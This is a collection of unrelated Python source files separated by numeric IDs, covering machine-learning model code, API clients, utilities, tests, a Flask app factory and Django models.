error("'%s' for node '%s' doesn't support dynamically supplied 'ends' tensor now"%(node.op_type, node.name)) if tensor_dict[node.inputs[3]]['data'] is None: error("'%s' for node '%s' doesn't support dynamically supplied 'axes' tensor now"%(node.op_type, node.name)) if tensor_dict[node.inputs[4]]['data'] is None: error("'%s' for node '%s' doesn't support dynamically supplied 'steps' tensor now"%(node.op_type, node.name)) if len(tensor_dict[node.inputs[1]]['data']) != 1 or len(tensor_dict[node.inputs[2]]['data']) != 1 or len(tensor_dict[node.inputs[3]]['data']) != 1 or len(tensor_dict[node.inputs[4]]['data']) != 1: error("'%s' for node '%s' only support slice on one axis now"%(node.op_type, node.name)) if tensor_dict[node.inputs[4]]['data'][0] != 1: error("'%s' for node '%s' only support 'steps' == 1 now"%(node.op_type, node.name)) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('slice'), 'optype': 'slice', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'start', 'value': tensor_dict[node.inputs[1]]['data'][0]}, {'arg_name': 'axis', 'value': tensor_dict[node.inputs[3]]['data'][0]}, {'arg_name': 'len', 'value': tensor_dict[node.inputs[2]]['data'][0]-tensor_dict[node.inputs[1]]['data'][0]}]} return [op] def Softmax(node, tensor_dict): assert node.op_type == 'Softmax' if not 'axis' in node.attrs: axis = 1 else: axis = node.attrs['axis'] tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('softmax'), 'optype': 'softmax', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'axis', 'value': axis}]} return [op] def Transpose(node, tensor_dict): assert node.op_type == 'Transpose' tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('transpose'), 'optype': 'transpose', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'axes', 'value': node.attrs['perm']}]} return [op] def Upsample(node, tensor_dict): assert node.op_type == 'Upsample' if not 'mode' in node.attrs: mode = 'TL_NEAREST' elif node.attrs['mode'] == 'nearest': mode = 'TL_NEAREST' elif node.attrs['mode'] == 'linear': mode = 'TL_LINEAR' else: error("'%s' for node '%s' doesn't support 'mode' == '%s'"%(node.op_type, node.name, node.attrs['mode'])) assert node.inputs[1] in tensor_dict if tensor_dict[node.inputs[1]]['data'] is None: error("'%s' for node '%s' doesn't support dynamically supplied 'scales' tensor now"%(node.op_type, node.name)) tensor_dict[node.outputs[0]] = {'name': node.outputs[0], 'dtype': tensor_dict[node.inputs[0]]['dtype'], 'dims': None, # TODO: do shape inference 'data': None} op = {'name': new_opname('resize'), 'optype': 'resize', 'tensors_in': [{'arg_name': 'src', 'name': node.inputs[0]}], 'tensors_out': [{'arg_name': 'dst', 'name': node.outputs[0]}], 'params': [{'arg_name': 'mode', 'value': mode}, {'arg_name': 'scales', 'value': tensor_dict[node.inputs[1]]['data']}]} return [op] onnx_to_ln_op_converters = { 'Add': Add, 'ArgMax': ArgMax, 'AveragePool': AveragePool, 'BatchNormalization': BatchNormalization, 'Concat': Concat, 'Constant': Constant, 'Conv': Conv, 'Div': Div, 'Dropout': Dropout, 'LeakyRelu': LeakyRelu, 'MaxPool': MaxPool, 'Pow': Pow, 'ReduceMax': ReduceMax, 'Relu': Relu, 'Reshape': Reshape, 'Resize': Resize, 'Sigmoid': Sigmoid, 'Slice': Slice, 'Softmax': Softmax, 'Transpose': Transpose, 'Upsample': Upsample, } def unsupported_node(node, tensor_dict): error("Unimplemented ONNX operator type '%s' for node '%s'"%(node.op_type, node.name)) def onnx_node_to_ln_op(onnx_node, tensor_dict): return onnx_to_ln_op_converters.get(onnx_node.op_type, unsupported_node)(onnx_node, tensor_dict)
11569765
from __future__ import print_function import argparse import os import random import torch import torch.nn as nn import torch.nn.parallel import torch.backends.cudnn as cudnn import torch.optim as optim from torch.utils.data import DataLoader from torch.autograd import Variable import torch.nn.functional as F import skimage import skimage.io import numpy as np import time import math from dataloader import dataloader_kitti141 as DL from models import * from path import Path parser = argparse.ArgumentParser(description='LidarStereoNet') parser.add_argument('--maxdisp', type=int ,default=192, help='maxium disparity') parser.add_argument('--model', default='stackhourglass', help='select model') parser.add_argument('--datatype', default='kitti', help='datapath') parser.add_argument('--datapath', default='./data', help='datapath') parser.add_argument('--loadmodel', default=None, help='load model') parser.add_argument('--savemodel', default='./results/', help='save model') parser.add_argument('--no-cuda', action='store_true', default=False, help='enables CUDA training') parser.add_argument('--seed', type=int, default=1, metavar='S', help='random seed (default: 1)') parser.add_argument('--gpu', default="1", type=str, help='Which GPU to use? (default:3)') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() save_path = Path(args.savemodel) save_path.makedirs_p() torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) left_test, right_test, displ_test, dispr_test = DL.test_Kitti141(args.datapath) test_dataset = DL.TestLoader(False, left_test, right_test, displ_test, dispr_test ) TestImgLoader = DataLoader(dataset=test_dataset, batch_size=1, num_workers=1, shuffle=False, drop_last=False) if args.model == 'stackhourglass': model = stackhourglass(args.maxdisp) else: print('no model') if args.cuda: model = nn.DataParallel(model) model.cuda() if os.path.isfile(args.loadmodel): print("=> loading checkpoint '{}'".format(args.loadmodel)) checkpoint = torch.load(args.loadmodel) model.load_state_dict(checkpoint['state_dict'], strict=True) else: print("=> no checkpoint found at '{}'".format(args.loadmodel)) print('Number of model parameters: {}'.format(sum([p.data.nelement() for p in model.parameters()]))) optimizer = optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999)) def test(imgL, imgR, disp_L, disp_R): model.eval() # Pad images such that the dimensions are multiples of 32 shape = imgL.shape height_new = int(np.ceil(shape[2]/32.)*32) width_new = int(np.ceil(shape[3]/32.)*32) padding = (0, width_new-shape[3], 0, height_new-shape[2]) imgL = F.pad(imgL, padding, "constant", 0) imgR = F.pad(imgR, padding, "constant", 0) disp_L = F.pad(disp_L, padding, "constant", 0) disp_R = F.pad(disp_R, padding, "constant", 0) imgL = Variable(torch.FloatTensor(imgL)) imgR = Variable(torch.FloatTensor(imgR)) disp_L = Variable(torch.FloatTensor(disp_L)) disp_R = Variable(torch.FloatTensor(disp_R)) if args.cuda: imgL, imgR, disp_L, disp_R = imgL.cuda(), imgR.cuda(), disp_L.cuda(), disp_R.cuda() with torch.no_grad(): outputl3, outputr3 = model(imgL,imgR, disp_L, disp_R) # Change output to original shape outputl3 = outputl3[:, :shape[2], :shape[3]] outputr3 = outputr3[:, :shape[2], :shape[3]] pred_disp = outputl3.data.cpu() output = torch.squeeze(pred_disp,1)[:,:,:] torch.cuda.empty_cache() return output def main(): # TEST ## num_samples = len(left_test) for batch_idx, (imgL, imgR, dispL, dispR) in enumerate(TestImgLoader): output = test(imgL, imgR, dispL, dispR) # save prediction disp_est = torch.squeeze(output).numpy() skimage.io.imsave(args.savemodel+'images/'+ left_test[batch_idx][-13:], (disp_est*256).astype('uint16')) print('Inference Image: %s' %(left_test[batch_idx][-13:])) if __name__ == '__main__': main()
11569778
import hashlib import string from typing import ( Any, Dict, Hashable, Iterable, Iterator, List, Mapping, Optional, Tuple, TypeVar, ) T = TypeVar('T') K = TypeVar('K') V = TypeVar('V') H = TypeVar('H', bound=Hashable) # Based on: https://stackoverflow.com/a/2704866 # Perhaps one day: https://peps.python.org/pep-0603/ class FrozenDict(Mapping[K, V]): _dict: Dict[K, V] _hash: Optional[int] def __init__(self, *args, **kwargs): self._dict = dict(*args, **kwargs) self._hash = None def __iter__(self) -> Iterator[K]: return iter(self._dict) def __len__(self) -> int: return len(self._dict) def __getitem__(self, key: K) -> V: return self._dict[key] def __hash__(self) -> int: if self._hash is None: h = 0 for pair in self.items(): h ^= hash(pair) self._hash = h return self._hash def __str__(self) -> str: return f'FrozenDict({str(self._dict)})' def __repr__(self) -> str: return f'FrozenDict({repr(self._dict)})' def merge_with(f, d1: Mapping, d2: Mapping) -> Dict: res = dict(d1) for k, v2 in d2.items(): if k in d1: v1 = d1[k] res[k] = f(v1, v2) else: res[k] = v2 return res def find_common_items(l1: Iterable[T], l2: Iterable[T]) -> Tuple[List[T], List[T], List[T]]: common = [] for i in l1: if i in l2: common.append(i) newL1 = [] newL2 = [] for i in l1: if i not in common: newL1.append(i) for i in l2: if i not in common: newL2.append(i) return (common, newL1, newL2) def intersperse(iterable: Iterable[T], delimiter: T) -> Iterator[T]: it = iter(iterable) try: yield next(it) except StopIteration: return for x in it: yield delimiter yield x def unique(iterable: Iterable[H]) -> Iterator[H]: elems = set() for elem in iterable: if elem in elems: continue else: elems.add(elem) yield elem def nonempty_str(x: Any) -> str: if x is None: raise ValueError('Expected nonempty string, found: null.') if type(x) is not str: raise TypeError('Expected nonempty string, found: {type(x)}') if x == '': raise ValueError("Expected nonempty string, found: ''") return x # Hashes def hash_str(x: Any) -> str: hash = hashlib.sha256() hash.update(str(x).encode('utf-8')) return str(hash.hexdigest()) def is_hash(x: Any) -> bool: # NB! currently only sha256 in hexdec form is detected # 2b9e b7c5 441e 9f7e 97f9 a4e5 fc04 a0f7 9f62 c8e9 605a ad1e 02db e8de 3c21 0422 # 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 return type(x) is str and len(x) == 64 and all(c in string.hexdigits for c in x) def shorten_hash(h: str, leftChars=6, rightChars=6) -> str: left = h[0:leftChars] if leftChars > 0 else '' right = h[-rightChars:] if rightChars > 0 else '' return left + ".." + right def shorten_hashes(value: Any, leftChars=6, rightChars=6) -> Any: result: Any = None if is_hash(value): result = shorten_hash(value, leftChars, rightChars) elif type(value) is tuple: result = tuple([shorten_hashes(item) for item in value]) elif type(value) is list: result = [shorten_hashes(v) for v in value] elif type(value) is dict: result = {} for (k, v) in value.items(): result[shorten_hashes(k)] = shorten_hashes(v) elif type(value) is set: result = set() for item in value: result.add(shorten_hashes(item)) else: result = value return result def compare_short_hashes(lhs: str, rhs: str): left, right = lhs.split('.'), rhs.split('.') (l0, l1, r0, r1) = (left[0].upper(), left[-1].upper(), right[0].upper(), right[-1].upper()) return (l0.startswith(r0) or r0.startswith(l0)) and (l1.endswith(r1) or r1.endswith(l1))
11569779
from torch import nn magic_number = -1.0E+10 def run_lstm(module, H): H = nn.utils.rnn.pack_sequence(H, enforce_sorted=False) Y, _ = module(H) Y, lengths = nn.utils.rnn.pad_packed_sequence(Y, batch_first=True) Y = [Y[i, :length] for i, length in enumerate(lengths)] return Y
11569806
import sys from fractions import gcd def lcm(a,b): return (a*b)/gcd(a, b) n, m = raw_input().strip().split(' ') n, m = [int(n), int(m)] a = map(int, raw_input().strip().split(' ')) b = map(int, raw_input().strip().split(' ')) count=0 lcm=reduce(lcm, a) gcd=reduce(gcd, b) lcm_copy = lcm while(lcm<=gcd): if gcd%lcm==0: count=count+1 lcm=lcm+lcm_copy print(count)
11569813
import datetime from quantdsl.domain.model.market_simulation import MarketSimulation from quantdsl.domain.model.simulated_price import make_simulated_price_id, SimulatedPrice from quantdsl.defaults import DEFAULT_PRICE_PROCESS_NAME from quantdsl.tests.test_application import ApplicationTestCase class TestMarketSimulation(ApplicationTestCase): NUMBER_MARKETS = 2 NUMBER_DAYS = 5 PATH_COUNT = 200 def test_register_market_simulation(self): # Set up the market calibration. price_process_name = DEFAULT_PRICE_PROCESS_NAME calibration_params = { 'market': ['#1', '#2'], 'sigma': [0.1, 0.2], 'curve': { '#1': [ ('2011-1-1', 10), ], '#2': [ ('2011-1-1', 20), ], }, 'rho': [ [1.0, 0.5], [0.5, 1.0], ], } market_calibration = self.app.register_market_calibration(price_process_name, calibration_params) # Create a market simulation for a list of markets and fixing times. commodity_names = ['#%d' % (i+1) for i in range(self.NUMBER_MARKETS)] fixing_dates = [datetime.datetime(2011, 1, 1) + datetime.timedelta(days=i) for i in range(self.NUMBER_DAYS)] observation_date = fixing_dates[0] simulation_requirements = [] for commodity_name in commodity_names: for fixing_date in fixing_dates: simulation_requirements.append((commodity_name, fixing_date, fixing_date)) path_count = self.PATH_COUNT market_simulation = self.app.register_market_simulation( market_calibration_id=market_calibration.id, requirements=simulation_requirements, observation_date=observation_date, path_count=path_count, interest_rate=2.5, ) assert isinstance(market_simulation, MarketSimulation) assert market_simulation.id market_simulation = self.app.market_simulation_repo[market_simulation.id] assert isinstance(market_simulation, MarketSimulation) self.assertEqual(market_simulation.market_calibration_id, market_calibration.id) # self.assertEqual(market_simulation.requirements[0], ['#1', '#2']) # self.assertEqual(market_simulation.fixing_dates, [datetime.date(2011, 1, i) for i in range(2, 6)]) self.assertEqual(market_simulation.observation_date, datetime.datetime(2011, 1, 1)) self.assertEqual(market_simulation.path_count, self.PATH_COUNT) # Check there are simulated prices for all the requirements. for requirement in simulation_requirements: commodity_name = requirement[0] fixing_date = requirement[1] delivery_date = requirement[2] simulated_price_id = make_simulated_price_id(market_simulation.id, commodity_name, fixing_date, delivery_date) simulated_price = self.app.simulated_price_repo[simulated_price_id] self.assertIsInstance(simulated_price, SimulatedPrice) self.assertTrue(simulated_price.value.mean())
11569823
from omni_reports.client.fields import AttributeReportField, MetricReportField, SegmentReportField from omni_reports.google_reports.base import GoogleAdsReportType BOOLEAN_VALUES = { 'true': True, 'false': False } def to_bool(val): return BOOLEAN_VALUES.get(val) class GoogleAdsAccountPerformanceReportType(GoogleAdsReportType): REPORT_TYPE = "ACCOUNT_PERFORMANCE_REPORT" account_id = AttributeReportField(target_name="ExternalCustomerId", display_name="Customer ID") date = SegmentReportField(target_name="Date", display_name="Day") cost = MetricReportField(target_name="Cost", display_name="Cost", map=lambda val: float(val) / 1e6) currency = AttributeReportField(target_name="AccountCurrencyCode", display_name="Currency") conversions = MetricReportField(target_name="Conversions", display_name="Conversions", type=float) cost_per_conversion = MetricReportField(target_name="CostPerConversion", display_name="Cost / conv.", map=lambda val: float(val) / 1e6) class GoogleAdsKeywordsPerformanceReportType(GoogleAdsReportType): REPORT_TYPE = "KEYWORDS_PERFORMANCE_REPORT" id = AttributeReportField(target_name="Id", display_name="Keyword ID") criteria = AttributeReportField(target_name="Criteria", display_name="Keyword") ad_group_id = AttributeReportField(target_name="AdGroupId", display_name="Ad group ID") ad_group_name = AttributeReportField(target_name="AdGroupName", display_name="Ad group") ad_group_status = AttributeReportField(target_name="AdGroupStatus", display_name="Ad group state") campaign_id = AttributeReportField(target_name="CampaignId", display_name="Campaign ID") campaign_name = AttributeReportField(target_name="CampaignName", display_name="Campaign") campaign_status = AttributeReportField(target_name="CampaignStatus", display_name="Campaign state") is_negative = AttributeReportField(target_name="IsNegative", display_name="Is negative", map=to_bool) has_quality_score = AttributeReportField(target_name="HasQualityScore", display_name="Has Quality Score", map=to_bool) quality_score = AttributeReportField(target_name="QualityScore", display_name="Quality score") cost = MetricReportField(target_name="Cost", display_name="Cost")
11569824
from keras.models import Model from utils.layers import Conv1D, _activation from keras.layers import Input, Concatenate, Reshape, Dense, Add,\ Activation, Flatten, Dropout, BatchNormalization,\ Flatten, RepeatVector, LocallyConnected1D, ZeroPadding1D,\ GRU from keras.layers.pooling import GlobalAveragePooling1D def fc_encoder(seqlen, latent_dim, alphabet_size=21, encoder_hidden=[250,250,250], encoder_dropout=[0.7,0.,0.], activation='relu', n_conditions=0): x = Input(shape=(seqlen, alphabet_size,)) h = Flatten()(x) if n_conditions>0: conditions = Input((n_conditions,)) h = Concatenate()([h, conditions]) for n_hid, drop in zip(encoder_hidden, encoder_dropout): h = Dense(n_hid, activation=activation)(h) if drop > 0: h = Dropout(drop)(h) #Variational parameters z_mean=Dense(latent_dim)(h) z_var=Dense(latent_dim, activation='softplus')(h) if n_conditions > 0: E = Model([x, conditions], [z_mean, z_var]) else: E = Model(x, [z_mean, z_var]) return E def cnn_encoder(original_dim, latent_dim, nchar=21, num_filters=21, kernel_size=2, BN=True, activation='prelu', dropout=None, log_transform_var=False, max_filters=10000, n_conv=5, n_conditions=None, n_dense_cond=6, cond_concat_dim=None): x = Input((original_dim, nchar)) h = x for i in range(n_conv): h = Conv1D(min(num_filters*(2**i), max_filters), kernel_size, activation=activation, strides=1 if i==0 else 2, use_bias=not BN, BN=BN, dropout=dropout)(h) h = Flatten()(h) if n_conditions>0: conditions, h_cond = cond_mlp(h._keras_shape[-1] if cond_concat_dim is None else cond_concat_dim, activation=activation, n_conditions=n_conditions, h=n_dense_cond) h = Concatenate()([h, h_cond]) z_mean = Dense(latent_dim)(h) z_var = Dense(latent_dim, activation='softplus')(h) if n_conditions>0: E = Model([x, conditions], [z_mean, z_var]) else: E = Model(x, [z_mean, z_var]) return E def cond_mlp(out_dim, n_layers=2, h=6, n_conditions=3, activation='prelu'): conditions = Input((n_conditions,)) h_cond = conditions for i in range(n_layers): h_cond = _activation(activation, BN=False)(Dense(h)(h_cond)) h_cond = Dense(out_dim)(h_cond) h_cond = _activation(activation, BN=False)(h_cond) return conditions, h_cond
11569830
from setuptools import setup def readme(): with open('README.rst') as f: return f.read() setup(name='scatnetgpu', version='1.1', description='Scattering Network for Python and CUDA', long_description=readme(), url='http://github.com/oinegue/scatnetgpu', author='<NAME>', author_email='<EMAIL>', license='MIT', packages=['scatnetgpu'], install_requires=[ 'pycuda>=2016.1.2', 'scikit-cuda>=0.5.1', 'numpy', 'scipy' ], include_package_data=True, zip_safe=False)
11569854
import re # 去除字符中不可见的控制字符 def remove_control_chars(s): ctl_list = list(range(0, 32)) + list(range(127, 160)) # 排除 \n 10 与 \r 13 ctl_list.remove(10) ctl_list.remove(13) control_chars = ''.join(map(chr, ctl_list)) control_char_re = re.compile('[%s]' % re.escape(control_chars)) return control_char_re.sub('', s)
11569865
import requests from functools import wraps from .auth import OAuth from . import endpoints class Client: prefix = 'https://api.spotify.com/v1' api = endpoints # So static analysis is useful def __init__(self, auth: OAuth, requests_session=None): self.session = requests_session or requests.Session() self.auth = auth class Api: pass self.api = Api() # So endpoints module is not modified self.api.request = self.request for name, member in endpoints.__dict__.items(): if name.startswith('_'): continue method = self._build_request(member) setattr(self.api, name, method) def _build_request(self, func): # Takes endpoint functions and performs actual requests @wraps(func) def wrapper(*args, **kwargs): return self.request(**func(*args, **kwargs)) return wrapper def headers(self): return {'Authorization': 'Bearer '+self.auth.token['access_token']} def request(self, method, url, params=None, payload=None, data=None, additional_headers=None): if additional_headers is None: additional_headers = {} url = url if url.startswith('http') else self.prefix+url headers = {**self.headers(), **additional_headers} response = self.session.request( method, url, params=params, json=payload, headers=headers, data=data ) response.raise_for_status() if not response.text: return return response.json()
11569886
class VM_Disassembler: def __init__(self, code, disassembler, entry_point, look_ahead_len = 0): # code is a list of ints self.code = code # this the core disassembler function # the user needs to write it self.disassembler = disassembler self.entry_point = entry_point # how many bytes to check when disassembling the current instruction # this can be set to the max length of an instruction # leave it to 0 if unsure self.look_ahead_len = look_ahead_len # the set of addresses that we have already processed self.disassembled_addr = set() # the list of addresses to process self.disassemble_queue = [self.entry_point] # utility def format_bytes(self, data): s = '' for c in data: s += '%02x' % c return s # the core function for the recursive disassembly def disassemble(self): # check whethe we have adress to disassemble while len(self.disassemble_queue) > 0: addr = self.disassemble_queue.pop() if addr in self.disassembled_addr: continue else: self.disassembled_addr.add(addr) if addr >= len(self.code): # there is probably an error in the disassembler # but for now we just ignore it continue # prepare the data and send it to self.disassembler() if self.look_ahead_len == 0: data_to_parse = self.code[addr : ] else: data_to_parse = self.code[addr : addr + self.look_ahead_len] instr_len, instr_text, possible_next_instrs = \ self.disassembler(addr, data_to_parse) # put every next possible addresses into the queue for next_addr in possible_next_instrs: self.disassemble_queue.append(next_addr) # print the address, raw bytes, and the disassembly text of the current instruction instr_bytes = self.code[addr : addr + instr_len] print('0x%x %s %s' % (addr, self.format_bytes(instr_bytes), instr_text)) print('Pasring done! Good luck with reversing')
11569940
from .. import utils as test_utils teamocil_yaml = test_utils.read_config_file("config_teamocil/test2.yaml") teamocil_dict = { "windows": [ { "name": "sample-four-panes", "root": "~/Code/sample/www", "layout": "tiled", "panes": [{"cmd": "pwd"}, {"cmd": "pwd"}, {"cmd": "pwd"}, {"cmd": "pwd"}], } ] } expected = { "session_name": None, "windows": [ { "window_name": "sample-four-panes", "layout": "tiled", "start_directory": "~/Code/sample/www", "panes": [ {"shell_command": "pwd"}, {"shell_command": "pwd"}, {"shell_command": "pwd"}, {"shell_command": "pwd"}, ], } ], }
11569953
import os from dotenv import load_dotenv from flask import Flask, jsonify load_dotenv() def create_app(): app = Flask(__name__, static_folder="./../dist/static") app.config.from_object(os.getenv("APP_SETTINGS")) app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False register_extensions(app) register_blueprints(app) return app def register_extensions(app): from server.extensions import ( db, migrate, mail, babel, cors, jwt, cache, compress, ) db.init_app(app) migrate.init_app(app, db) mail.init_app(app) babel.init_app(app) cors.init_app( app, resources={r"/api/*": {"origins": "*"}}, supports_credentials=True ) jwt.init_app(app) cache.init_app(app) compress.init_app(app) # Return validation errors as JSON @app.errorhandler(422) @app.errorhandler(400) def handle_error(err): messages = err.data.get("messages", "Invalid request.") return jsonify({"message": messages["json"]}), 400 def register_blueprints(app): from server.views import blueprints from server.client import client_bp for blueprint in blueprints: app.register_blueprint(blueprint.bp) if app.config.get("SHOULD_PROXY", False): app.register_blueprint(client_bp)
11569967
import numpy as np import logging from FixedBase import FixedBase class FixedPredict(FixedBase): def __init__(self, iterations=1): super().__init__(iterations) def predict(self, X, feature_names): return self.work()
11569991
from __future__ import unicode_literals from frappe import _ def get_data(): return [ { "label": _("Web Site"), "items": [ { "type": "doctype", "name": "Website Info", "description": _("Website Info"), } ] } ]
11570035
import unittest from twstock.proxy import get_proxies, configure_proxy_provider, reset_proxy_provider from twstock.proxy import SingleProxyProvider from twstock.proxy import RoundRobinProxiesProvider class ProxyProviderTest(unittest.TestCase): def setUp(self): reset_proxy_provider() def tearDown(self): reset_proxy_provider() def test_configure(self): # default values are empty self.assertDictEqual({}, get_proxies()) # configure fake proxy configure_proxy_provider(SingleProxyProvider(dict(http="http-proxy", https="https-proxy"))) self.assertEqual("http-proxy", get_proxies()['http']) self.assertEqual("https-proxy", get_proxies()['https']) # reset proxy reset_proxy_provider() self.assertDictEqual({}, get_proxies()) def test_rr_proxies_provider(self): proxies = ['a', 'b', 'c'] rr_provider = RoundRobinProxiesProvider(proxies) for _ in range(3): for p in proxies: self.assertEqual(rr_provider.get_proxy(), p) proxies = ['d', 'e', 'f'] rr_provider.proxies = proxies for _ in range(3): for p in proxies: self.assertEqual(rr_provider.get_proxy(), p)
11570039
import io import logging import sys from contextlib import contextmanager from test_junkie.decorators import synchronized class LogJunkie: __LOGGER = None __ENABLED = False __PRIORITY = logging.ERROR __NAME = "TestJunkieLogger" __FORMAT = "%(asctime)s [%(levelname)s] (%(filename)s, %(funcName)s(), %(lineno)d - %(threadName)s) :: %(message)s" @staticmethod def enable_logging(level): LogJunkie.__ENABLED = True LogJunkie.__PRIORITY = level @staticmethod def disable_logging(): LogJunkie.__ENABLED = False @staticmethod @synchronized() def __get_logger(): if LogJunkie.__LOGGER is None: stderr_handler = logging.StreamHandler() stderr_handler.setFormatter(logging.Formatter(LogJunkie.__FORMAT)) LogJunkie.__LOGGER = logging.getLogger(LogJunkie.__NAME) LogJunkie.__LOGGER.addHandler(stderr_handler) LogJunkie.__LOGGER.setLevel(LogJunkie.__PRIORITY) return LogJunkie.__LOGGER @staticmethod def info(msg): if LogJunkie.__ENABLED: LogJunkie.__get_logger().info(msg) @staticmethod def debug(msg): if LogJunkie.__ENABLED: LogJunkie.__get_logger().debug(msg) @staticmethod def error(msg, exc_info=False): if LogJunkie.__ENABLED: LogJunkie.__get_logger().error(msg, exc_info=exc_info) @staticmethod def warn(msg): if LogJunkie.__ENABLED: LogJunkie.__get_logger().warning(msg) @contextmanager def suppressed_stdout(suppress=False): if suppress: original_stdout = sys.stdout if sys.version_info[0] < 3: sys.stdout = io.BytesIO() # works with python 2 else: sys.stdout = io.StringIO() # works with python 3 original_level = logging.root.manager.disable logging.disable(logging.ERROR) try: yield finally: sys.stdout = original_stdout logging.disable(original_level) else: yield
11570080
from copy import copy import os from schemer import ValidationException from ..compiler.spec_assembler import get_specs_path, get_specs_from_path from ..log import log_to_client from ..schemas import app_schema, bundle_schema, lib_schema from ..schemas.base_schema_class import notifies_validation_exception from .. import constants from ..payload import daemon_command def _check_bare_minimum(specs): if not specs.get('bundles'): raise ValidationException("No Bundles found - exiting") @notifies_validation_exception def _validate_app_references(app, specs): for spec_type in ['apps', 'libs', 'services']: dependent = app['depends'][spec_type] if spec_type in ['apps', 'services']: dependent += app['conditional_links'][spec_type] not_present = set(dependent) - set(specs[spec_type].keys()) if not_present: raise ValidationException('{} {} are not present in your specs'.format(spec_type, ', '.join(not_present))) @notifies_validation_exception def _validate_bundle_references(bundle, specs): not_present = set(bundle['apps']) - set(specs['apps'].keys()) if not_present: raise ValidationException('Apps {} are not present in your specs'.format(', '.join(not_present))) @notifies_validation_exception def _validate_lib_references(lib, specs): not_present = set(lib['depends']['libs']) - set(specs['libs'].keys()) if not_present: raise ValidationException('Libs {} are not present in your specs'.format(', '.join(not_present))) def _check_nginx_name_conflict(specs): apps = set(specs['apps'].keys()) services = set(specs['services'].keys()) if constants.DUSTY_NGINX_NAME in apps.union(services): raise ValidationException('The name {} is reserved for use by Dusty\'s internal nginx - please choose a different name'.format(constants.DUSTY_NGINX_NAME)) def _check_name_overlap(specs): apps = set(specs['apps'].keys()) libs = set(specs['libs'].keys()) services = set(specs['services'].keys()) app_service_overlap = apps.intersection(services) if app_service_overlap: raise ValidationException('Apps and services cannot share names: {}'.format(app_service_overlap)) app_lib_overlap = apps.intersection(libs) if app_lib_overlap: raise ValidationException('Apps and libs cannot share names: {}'.format(app_lib_overlap)) service_lib_overlap = services.intersection(libs) if service_lib_overlap: raise ValidationException('Services and libs cannot share names: {}'.format(service_lib_overlap)) def _validate_spec_names(specs): _check_name_overlap(specs) _check_nginx_name_conflict(specs) for app in specs['apps'].values(): _validate_app_references(app, specs) for bundle in specs['bundles'].values(): _validate_bundle_references(bundle, specs) for lib in specs['libs'].values(): _validate_lib_references(lib, specs) def _cycle_check(spec, specs, upstream): for dependent in spec['depends'][spec.spec_type]: if dependent in upstream: raise ValidationException("Cycle found for {0} {1}. Upstream: {2}".format(spec.type_singular, spec.name, upstream)) else: new_upstream = copy(upstream) new_upstream.add(dependent) _cycle_check(specs[spec.spec_type][dependent], specs, new_upstream) def _validate_cycle_free(specs): for spec_type in ['apps', 'libs']: for spec in specs[spec_type].values(): _cycle_check(spec, specs, set([spec.name])) def validate_specs_from_path(specs_path): """ Validates Dusty specs at the given path. The following checks are performed: -That the given path exists -That there are bundles in the given path -That the fields in the specs match those allowed in our schemas -That references to apps, libs, and services point at defined specs -That there are no cycles in app and lib dependencies """ # Validation of fields with schemer is now down implicitly through get_specs_from_path # We are dealing with Dusty_Specs class in this file log_to_client("Validating specs at path {}".format(specs_path)) if not os.path.exists(specs_path): raise RuntimeError("Specs path not found: {}".format(specs_path)) specs = get_specs_from_path(specs_path) _check_bare_minimum(specs) _validate_spec_names(specs) _validate_cycle_free(specs) log_to_client("Validation Complete!") @daemon_command def validate_specs(): """ Validates specs using the path configured in Dusty's configuration """ validate_specs_from_path(get_specs_path())
11570141
from transformers import T5ForConditionalGeneration, T5Tokenizer # initialize the model architecture and weights model = T5ForConditionalGeneration.from_pretrained("t5-base") # initialize the model tokenizer tokenizer = T5Tokenizer.from_pretrained("t5-base") article = """ <NAME> and <NAME>, welcome to parenthood. The celebrity couple announced the arrival of their son, <NAME>, in statements to People. "Silas was the middle name of Timberlake's maternal grandfather <NAME>, who died in 2012, while Randall is the musician's own middle name, as well as his father's first," People reports. The couple announced the pregnancy in January, with an Instagram post. It is the first baby for both. """ # encode the text into tensor of integers using the appropriate tokenizer inputs = tokenizer.encode("summarize: " + article, return_tensors="pt", max_length=512, truncation=True) # generate the summarization output outputs = model.generate( inputs, max_length=150, min_length=40, length_penalty=2.0, num_beams=4, early_stopping=True) # just for debugging print(outputs) print(tokenizer.decode(outputs[0]))
11570204
from django.db import models class Author(models.Model): name = models.CharField(max_length=250) nickname = models.CharField(max_length=100) class Book(models.Model): title = models.CharField(max_length=200) description = models.TextField() publication_date = models.DateField() isbn = models.CharField(max_length=17) author = models.ForeignKey(Author)
11570209
